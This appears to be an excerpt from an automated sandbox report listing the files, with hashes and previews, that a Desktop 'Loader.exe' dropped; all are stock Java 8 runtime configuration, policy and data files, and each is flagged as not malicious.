                                                                                                                                                                                                                                                                                                              Size (bytes):3144
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.858724831876285
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:############################################################..# .Default Networking Configuration File..#..# This file may contain default values for the networking system properties...# These values are only used when the system properties are not specified..# on the command line or set programatically...# For now, only the various proxy settings can be configured here...############################################################....# Whether or not the DefaultProxySelector will default to System Proxy..# settings when they do exist...# Set it to 'true' to enable this feature and check for platform..# specific proxy settings..# Note that the system properties that do explicitely set proxies..# (like http.proxyHost) do take precedence over the system settings..# even if java.net.useSystemProxies is set to true... ..java.net.useSystemProxies=false....#------------------------------------------------------------------------..# Proxy configuration for the various protocol handlers...# D
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1012097
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.896417877823185
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24576:q7jNpf26MPAMSL/wxSz2ijt2eejo+oV3vv:6NVZEaL4xSljt2eHNV3
                                                                                                                                                                                                                                                                                                              MD5:54EF6C22FAAAE5850091031763078D37
                                                                                                                                                                                                                                                                                                              SHA1:11D40B78BB606E245CB5E17C6DDB08193A34B40E
                                                                                                                                                                                                                                                                                                              SHA-256:654B033B1DC315EB9806F0D35ABAF3F25064AC806292ACB2BD818F6B2DF2AD07
                                                                                                                                                                                                                                                                                                              SHA-512:10998B6508D5571E1ECE2001C6E561169D3DBD7580A3DE439067D1195FBE85E6BD1729A0874E306234391AF963E1B062050276E1AC0E9C9FA289711738B41B31
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2915
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2172692442941075
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:GgQv18IsTJvuUdEt6u7KeblbhGwQEvzZIE+i+WEi+Iq4fNSg2kv:Gb6Xha1hFGwQEvdh+5g2kv
                                                                                                                                                                                                                                                                                                              MD5:A38587427E422D55B012FA3E5C9436D2
                                                                                                                                                                                                                                                                                                              SHA1:7BD1B81B39DA78124BE045507E0681E860921DBB
                                                                                                                                                                                                                                                                                                              SHA-256:D2C47DE948033ED836B375CCD518CF55333FE11C4CED56BC1CE2FF62114CF546
                                                                                                                                                                                                                                                                                                              SHA-512:EA6CA975E9308ED2B3BBCCE91EE61142DAB0067CE8F17CB469929F6136E6B4A968BAC838141D8B38866F9EF5E15E156400859CCCC84FB114214E19556F0DC636
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..#..# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.Japanese PostScript printer property file..#..font.num=16..#..serif=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..monospaced=monospaced..courier=monospaced..dialog=sansserif..dialoginput=monospaced..#..serif.latin1.plain=Times-Roman..serif.latin1.italic=Times-Italic..serif.latin1.bolditalic=Times-BoldItalic..serif.latin1.bold=Times-Bold..#..sansserif.latin1.plain=Helvetica..sansserif.latin1.italic=Helvetica-Oblique..sansserif.latin1.bolditalic=Helvetica-BoldOblique..sansserif.latin1.bold=Helvetica-Bold..#..monospaced.latin1.plain=Courier..monospaced.latin1.italic=Courier-Oblique..monospaced.latin1.bolditalic=Courier-BoldOblique..monospaced.latin1.bold=Courier-Bold..#..serif.x11jis0208.plain=Ryumin-Light-H..serif.x11jis0208.italic=Ryumin-Light-H
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):10716
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.016037435830914
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Jp22HdiEUEdWUcPeJ7fbdHmcbiLMWNDyZcy57ha1xh3qvfRdIdyJkW:u2HdiEUEdGY1gbD9TKdIdyJkW
                                                                                                                                                                                                                                                                                                              MD5:66B3E6770C291FE8CD3240FFBB00DC47
                                                                                                                                                                                                                                                                                                              SHA1:88CE9D723A2D4A07FD2032A8B4A742FE323EEC8F
                                                                                                                                                                                                                                                                                                              SHA-256:7EA6E05D3B8B51D03C3D6548E709C220541DF0F1AEE2E69B9101C9F051F7C17A
                                                                                                                                                                                                                                                                                                              SHA-512:D1B99AA011568AFFA415758C986B427588AE87FE5EB7FC52D519F7167AD46BBFF8B62799F14D8DBC7C55DEB6FF7259445D6E8882CC781D61206ED1B79B688745
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..#..# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.PostScript printer property file for Java 2D printing...#..# WARNING: This is an internal implementation file, not a public file...# Any customisation or reliance on the existence of this file and its..# contents or syntax is discouraged and unsupported...# It may be incompatibly changed or removed without any notice...#..#..font.num=35..#..# Legacy logical font family names and logical font aliases should all..# map to the primary logical font names...#..serif=serif..times=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..dialog=sansserif..dialoginput=monospaced..monospaced=monospaced..courier=monospaced..#..# Next, physical fonts which can be safely mapped to standard postscript fonts..# These keys generally map to a value which is the same as the key, so
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3490933
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.067002853185717
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:WX4zfeUcKDQ1toKXiO3fLxqhH3YRazQwIK7XgnyRMvMtMm55HopLKbtJzUkMkOBV:GL
                                                                                                                                                                                                                                                                                                              MD5:9A084B91667E7437574236CD27B7C688
                                                                                                                                                                                                                                                                                                              SHA1:D8926CC4AA12D6FE9ABE64C8C3CB8BC0F594C5B1
                                                                                                                                                                                                                                                                                                              SHA-256:A1366A75454FC0F1CA5A14EA03B4927BB8584D6D5B402DFA453122AE16DBF22D
                                                                                                                                                                                                                                                                                                              SHA-512:D603AA29E1F6EEFFF4B15C7EBC8A0FA18E090D2E1147D56FD80581C7404EE1CB9D6972FCF2BD0CB24926B3AF4DFC5BE9BCE1FE018681F22A38ADAA278BF22D73
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):63602929
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.963369315504544
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:786432:WyfysbZyGp7g85KKwcl0HeJgyll3LTjjA:F0GZTjjA
                                                                                                                                                                                                                                                                                                              MD5:EDB5B5B3EF4565E4E86BFFE647FB1AA2
                                                                                                                                                                                                                                                                                                              SHA1:11F5B1B2D729309059B1BD1FE2922251D9451D5F
                                                                                                                                                                                                                                                                                                              SHA-256:D00351BD39DE7DBF9E9FDBB9EE1FD82189189F9BC82E988B58E1E950D1D4BDC8
                                                                                                                                                                                                                                                                                                              SHA-512:05E7F9ED915610B70664EB7CB68F3F0BBA5BD5CF208BBDB54007DA5FF6311A6DDBBF057E0DF5A346C9042333C29E5C766B2C0A686628F8655C2E75061A9179C1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3026
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.48902128028383
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:9JJweDY2LXQ4lAAldrou1YgH767KWajaHpwrHZt0H9BRJgfHilVVt2+HZ:PCcY26Iou1YgHqK3WJGeHn8fH4VVttHZ
                                                                                                                                                                                                                                                                                                              MD5:EE4ED9C75A1AAA04DFD192382C57900C
                                                                                                                                                                                                                                                                                                              SHA1:7D69EA3B385BC067738520F1B5C549E1084BE285
                                                                                                                                                                                                                                                                                                              SHA-256:90012F900CF749A0E52A0775966EF575D390AD46388C49D512838983A554A870
                                                                                                                                                                                                                                                                                                              SHA-512:EAE6A23D2FD7002A55465844E662D7A5E3ED5A6A8BAF7317897E59A92A4B806DD26F2A19B7C05984745050B4FE3FFA30646A19C0F08451440E415F958204137C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4149
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.816047466650347
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:ubCHVyxwEyPEtpuVFWny6NnXjekkMDV6kiPVNXvNhtfx5e6NgyufTMBwtBsv5XHs:ubCHVyxwEyPEtpuV8ny6NnX6kkMDV6kL
                                                                                                                                                                                                                                                                                                              MD5:3F5DC1D941E8356CCD04454AC0A7A7D2
                                                                                                                                                                                                                                                                                                              SHA1:3698F9AFD870C7959E2D8A0DA0A97B4475554831
                                                                                                                                                                                                                                                                                                              SHA-256:C48D57D64ED98F8F174A4F6873F536AE03B41A63F67079D7C2F7140950A1C02E
                                                                                                                                                                                                                                                                                                              SHA-512:65319A4EF150884F7E67C6F96085A996C9B32DCF9A539C4EB7AF77B1B46CDD90F1E83446F33DA14467EA37D0628C9411323F5C3D3CEFCF03CBDFA186EEB2BD3C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# JNLPAppletLauncher applet-launcher.jar..SHA1-Digest-Manifest: 5Bo5/eg892hQ9mgbUW56iDmsp1k=....# 7066583..SHA1-Digest-Manifest: x17xGEFzBRXY2pLtXiIbp8J7U9M=..SHA1-Digest-Manifest: ya6YNTzMCFYUO4lwhmz9OWhhIz8=..SHA1-Digest-Manifest: YwuPyF/KMcxcQhgxilzNybFM2+8=....# 7066809..SHA1-Digest-Manifest: dBKbNW1PZSjJ0lGcCeewcCrYx5g=..SHA1-Digest-Manifest: lTYCkD1wm5uDcp2G2PNPcADG/ds=..SHA1-Digest-Manifest: GKwQJtblDEuSVf3LdC1ojpUJRGg=....# 7186931..SHA1-Digest-Manifest: 0CUppG7J6IL8xHqPCnA377Koahw=..SHA1-Digest-Manifest: 3aJU1qSK6IYmt5MSh2IIIj5G1XE=..SHA1-Digest-Manifest: 8F4F0TXA4ureZbfEXWIFm76QGg4=..SHA1-Digest-Manifest: B1NaDg834Bgg+VE9Ca+tDZOd2BI=..SHA1-Digest-Manifest: bOoQga+XxC3j0HiP552+fYCdswo=..SHA1-Digest-Manifest: C4mtepHAyIKiAjjqOm6xYMo8TkM=..SHA1-Digest-Manifest: cDXEH+bR01R8QVxL+KFKYqFgsR0=..SHA1-Digest-Manifest: cO2ccW2cckTvpR0HVgQa362PyHI=..SHA1-Digest-Manifest: D/TyRle6Sl+CDuBFmdOPy03ERaw=..SHA1-Digest-Manifest: eJfWm86yHp2Oz5U8WrMKbpv6GGA=..SHA1-Digest-Manifest: g3mA5HqcRBlKa
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1273
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.167014768533289
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:NPwGDO0uFVW0mSDEYMZ9HWYZj4bJCC8lCEQqkvZq1n4v3CYe:NPrDJuF4oMyYZj4h8lCENq2+e
                                                                                                                                                                                                                                                                                                              MD5:BBEBCF13680E71EC2EE562524DA02660
                                                                                                                                                                                                                                                                                                              SHA1:C5C005C29A80493F5C31CD7EB629AC1B9C752404
                                                                                                                                                                                                                                                                                                              SHA-256:1FBEA394E634630894CF72DE02DF1846F32F3BB2067B3CB596700E4DD923F4B5
                                                                                                                                                                                                                                                                                                              SHA-512:B686236EEE055C97A96F5E31A2EE7CE57EED04C2175235CEB19F9F56ABFD22DB6FDCADE8C5D4BA7B656D69E923A1C5844C06DC959A4A915E215FB0ACE377B114
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Algorithm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
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java KeyStore
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):112860
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.58405956263152
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:knYlyRHbLD1Syx011lYcdSmjbDKuaG8QlpzHok0SeHX:knYlyRHrq5dbeO9pLD0SiX
                                                                                                                                                                                                                                                                                                              MD5:A2C167C8E0F275B234CB2C2E943781C7
                                                                                                                                                                                                                                                                                                              SHA1:2A6B5FBC476EA3A5DDFB4BF1F6CDF0C4DA843BB1
                                                                                                                                                                                                                                                                                                              SHA-256:A9263831583DFD58BC3584AA0B13E6CDE43403FB82093329B47BB65A8C701AFB
                                                                                                                                                                                                                                                                                                              SHA-512:8A0C2240C603210AE963C6A126D19BF51659FDED2228503BBF2A2662CCB73B0F9E18C020C9E5E2F3449E2F4F0006D68FE15C8FD5D91DEE8A1A6B42A49183BEAA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2515
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.490054643169131
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:nWjF29ShnQUQH2Hvh4ic1mo6wv1PdOpGLSYLHoQLZQ/1rJ+fSA:n+4AQWxc1tgAFH
                                                                                                                                                                                                                                                                                                              MD5:EC90FD04C2890584A16EB24664050C2A
                                                                                                                                                                                                                                                                                                              SHA1:C7FE062EAC95909EC6A5EA93F42DDA5E023AD82C
                                                                                                                                                                                                                                                                                                              SHA-256:CED51E3926E6B0CFEC8ECAB3B15D296FDCFAE4D32046224814AAAB5FD0FED9C0
                                                                                                                                                                                                                                                                                                              SHA-512:8DA494925B3B5AAE69A30A8B5F9732E64EDBAE39C968229D112185E349C410A0F5D1B281A4E44718E0120E910820B15CA878B2ED1CF905DFC6595F1BA34B85D3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:..// Standard extensions get all permissions by default....grant codeBase "file:${{java.ext.dirs}}/*" {.. permission java.security.AllPermission;..};....// default permissions granted to all domains....grant {.. // Allows any thread to stop itself using the java.lang.Thread.stop().. // method that takes no argument... // Note that this permission is granted by default only to remain.. // backwards compatible... // It is strongly recommended that you either remove this permission.. // from this policy file or further restrict it to code sources.. // that you specify, because Thread.stop() is potentially unsafe... // See the API specification of java.lang.Thread.stop() for more.. // information... permission java.lang.RuntimePermission "stopThread";.... // allows anyone to listen on dynamic ports.. permission java.net.SocketPermission "localhost:0", "listen";.... // "standard" properies that
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):27033
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.840685151784295
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:rmLHAEcqrlANbwbqL1AdLAHaPw2kqUTWip+fzIz:rWQaYFqUTWip0kz
                                                                                                                                                                                                                                                                                                              MD5:409C132FE4EA4ABE9E5EB5A48A385B61
                                                                                                                                                                                                                                                                                                              SHA1:446D68298BE43EB657934552D656FA9AE240F2A2
                                                                                                                                                                                                                                                                                                              SHA-256:4D9E5A12B8CAC8B36ECD88468B1C4018BC83C97EB467141901F90358D146A583
                                                                                                                                                                                                                                                                                                              SHA-512:7FED286AC9AED03E2DAE24C3864EDBBF812B65965C7173CC56CE622179EB5F872F77116275E96E1D52D1C58D3CDEBE4E82B540B968E95D5DA656AA74AD17400D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default.....# In this file, various security properties are set for use by..# java.security classes. This is where users can statically register..# Cryptography Packag
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.802539000066613
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:RSjGIWgjM0ePFUNaXsIGNDAPVnyzowv:RS6c2PFUsXsIrRqoa
                                                                                                                                                                                                                                                                                                              MD5:E0C4EF8B210C0DDFEE01126E1ACA4280
                                                                                                                                                                                                                                                                                                              SHA1:F1CC674F447045D668454996D5C3C188884762CD
                                                                                                                                                                                                                                                                                                              SHA-256:E5CD7F9FD43084674AA749BC8301F28DE85EEF6D01BD78828F72FA32377A3368
                                                                                                                                                                                                                                                                                                              SHA-512:4820074F15520AD099193B27A673499C31544A7279279EFCB6131D53FE997438A96E1C5B386C233385004F7A2FBB775D4CDE3C0272A196B54C0D8EE6CCEF43DF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:..grant codeBase "file:${jnlpx.home}/javaws.jar" {.. permission java.security.AllPermission;..};....
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3527
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.521709350514316
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:XWlvuYcIou1YgHqK3WwGjIEwtR88fH4VVKZ:sutuyOqKmw0QtRpH4VVKZ
                                                                                                                                                                                                                                                                                                              MD5:57AAAA3176DC28FC554EF0906D01041A
                                                                                                                                                                                                                                                                                                              SHA1:238B8826E110F58ACB2E1959773B0A577CD4D569
                                                                                                                                                                                                                                                                                                              SHA-256:B8BECC3EF2E7FF7D2165DD1A4E13B9C59FD626F20A26AF9A32277C1F4B5D5BC7
                                                                                                                                                                                                                                                                                                              SHA-512:8704B5E3665F28D1A0BC2A063F4BC07BA3C7CD8611E06C0D636A91D5EA55F63E85C6D2AD49E5D8ECE267D43CA3800B3CD09CF369841C94D30692EB715BB0098E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1249
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735634480139973
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:AJx/wzjJQO1YfK4pPq8Ul6GyGLCKDJ9w5lAu9aEVjEcGuc8X3A0LlmPOiMA0L9UV:w/61sppNUl6GbLCOMlmEOucA3e2s/WW
                                                                                                                                                                                                                                                                                                              MD5:BB63293B1207CB8608C5FBE089A1B06D
                                                                                                                                                                                                                                                                                                              SHA1:96A0FA723AF939C22AE25B164771319D82BC033B
                                                                                                                                                                                                                                                                                                              SHA-256:633015AD63728DFE7A51BF26E55B766DD3E935F1FCCCFFA8054BF6E158EA89B2
                                                                                                                                                                                                                                                                                                              SHA-512:0042DEBE4A77DA997A75A294A0C48D19AED258EEB3CD723FD305037DF11F0A5073A92CC54967B8B541E1AFC912F36481D0B0F68477B8156E52E15093722B7C32
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:############################################################..# Sound Configuration File..############################################################..#..# This properties file is used to specify default service..# providers for javax.sound.midi.MidiSystem and..# javax.sound.sampled.AudioSystem...#..# The following keys are recognized by MidiSystem methods:..#..# javax.sound.midi.Receiver..# javax.sound.midi.Sequencer..# javax.sound.midi.Synthesizer..# javax.sound.midi.Transmitter..#..# The following keys are recognized by AudioSystem methods:..#..# javax.sound.sampled.Clip..# javax.sound.sampled.Port..# javax.sound.sampled.SourceDataLine..# javax.sound.sampled.TargetDataLine..#..# The values specify the full class name of the service..# provider, or the device name...#..# See the class descriptions for details...#..# Example 1:..# Use MyDeviceProvider as default for SourceDataLines:..# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider..#..# Example 2:..# Speci
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):103910
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.113278604363908
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:OcQWmFKJzLl2g6kpE7tdTMBB/////t97Taz69rU4y/uqmol7s2gK:Oyh3F27/qGzkrfy/uqllQ2gK
                                                                                                                                                                                                                                                                                                              MD5:5A7F416BD764E4A0C2DEB976B1D04B7B
                                                                                                                                                                                                                                                                                                              SHA1:E12754541A58D7687DEDA517CDDA14B897FF4400
                                                                                                                                                                                                                                                                                                              SHA-256:A636AFA5EDBA8AA0944836793537D9C5B5CA0091CCC3741FC0823EDAE8697C9D
                                                                                                                                                                                                                                                                                                              SHA-512:3AB2AD86832B98F8E5E1CE1C1B3FFEFA3C3D00B592EB1858E4A10FFF88D1A74DA81AD24C7EC82615C398192F976A1C15358FCE9451AA0AF9E65FB566731D6D8F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...TZDB....2016d.S..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8602
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.204166069367786
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:j1kfcymkDvxeMmKg5GQEK2TtllXinSV29OHPQT:hhymk/QGT7YT
                                                                                                                                                                                                                                                                                                              MD5:B8DD8953B143685B5E91ABEB13FF24F0
                                                                                                                                                                                                                                                                                                              SHA1:B5CEB39061FCE39BB9D7A0176049A6E2600C419C
                                                                                                                                                                                                                                                                                                              SHA-256:3D49B3F2761C70F15057DA48ABE35A59B43D91FA4922BE137C0022851B1CA272
                                                                                                                                                                                                                                                                                                              SHA-512:C9CD0EB1BA203C170F8196CBAB1AAA067BCC86F2E52D0BAF979AAD370EDF9F773E19F430777A5A1C66EFE1EC3046F9BC82165ACCE3E3D1B8AE5879BD92F09C90
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# This file describes mapping information between Windows and Java..# time zones...# Format: Each line should include a colon separated fields of Windows..# time zone registry key, time zone mapID, locale (which is most..# likely used in the time zone), and Java time zone ID. Blank lines..# and lines that start with '#' are ignored. Data lines must be sorted..# by mapID (ASCII order)...#..# NOTE..# This table format is not a public interface of any Java..# platforms. No applications should depend on this file in any form...#..# This table has been generated by a program and should not be edited..# manually...#..Romance:-1,64::Europe/Paris:..Romance Standard Time:-1,64::Europe/Paris:..Warsaw:-1,65::Europe/Warsaw:..Central Europe:-1,66::Europe/Prague:..Central Europe Standard Time:-1,66::Europe/Prague:..Prague Bratislava:-1,66::Europe/Prague:..W. Central Africa Standard Time:-1,66:AO:Africa/Luanda:..FLE:-1,67:FI:Europe/Helsinki:..FLE Standard Time:-1,67:FI:E
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (427), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):533
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.416086012521588
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:GEKkc58IOlBVAQEjy2IM0oPP1RVtc8fFVKeiIdGIVIPJvq1RUbDcz:GEK7586QY/0oPtRb2TqySRUkz
                                                                                                                                                                                                                                                                                                              MD5:A61B1E3FE507D37F0D2F3ADD5AC691E0
                                                                                                                                                                                                                                                                                                              SHA1:8AE1050FF466B8F024EED5BC067B87784F19A848
                                                                                                                                                                                                                                                                                                              SHA-256:F9E84B54CF0D8CB0645E0D89BF47ED74C88AF98AC5BF9CCF3ACCB1A824F7DC3A
                                                                                                                                                                                                                                                                                                              SHA-512:3E88A839E44241AE642D0F9B7000D80BE7CF4BD003A9E2F9F04A4FEB61EC4877B2B4E76151503184F4B9978894BA1D0DE034DBC5F2E51C31B3ABB24F0EACF0C7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:JAVA_VERSION="1.8.0_101"..OS_NAME="Windows"..OS_VERSION="5.1"..OS_ARCH="i586"..SOURCE=" .:e983a19c6439 corba:2bb2aec4b3e5 deploy:2390a2618e98 hotspot:77df35b662ed hotspot/make/closed:40ee8a558775 hotspot/src/closed:710cffeb3c01 hotspot/test/closed:d6cfbcb20a1e install:68eb511e9151 jaxp:8ee36eca2124 jaxws:287f9e9d45cc jdk:827b2350d7f8 jdk/make/closed:53a5d48a69b0 jdk/src/closed:06c649fef4a8 jdk/test/closed:556c76f337b9 langtools:8dc8f71216bf nashorn:44e4e6cbe15b pubs:388b7b93b2c0 sponsors:1b72bbdb30d6"..BUILD_TYPE="commercial"..
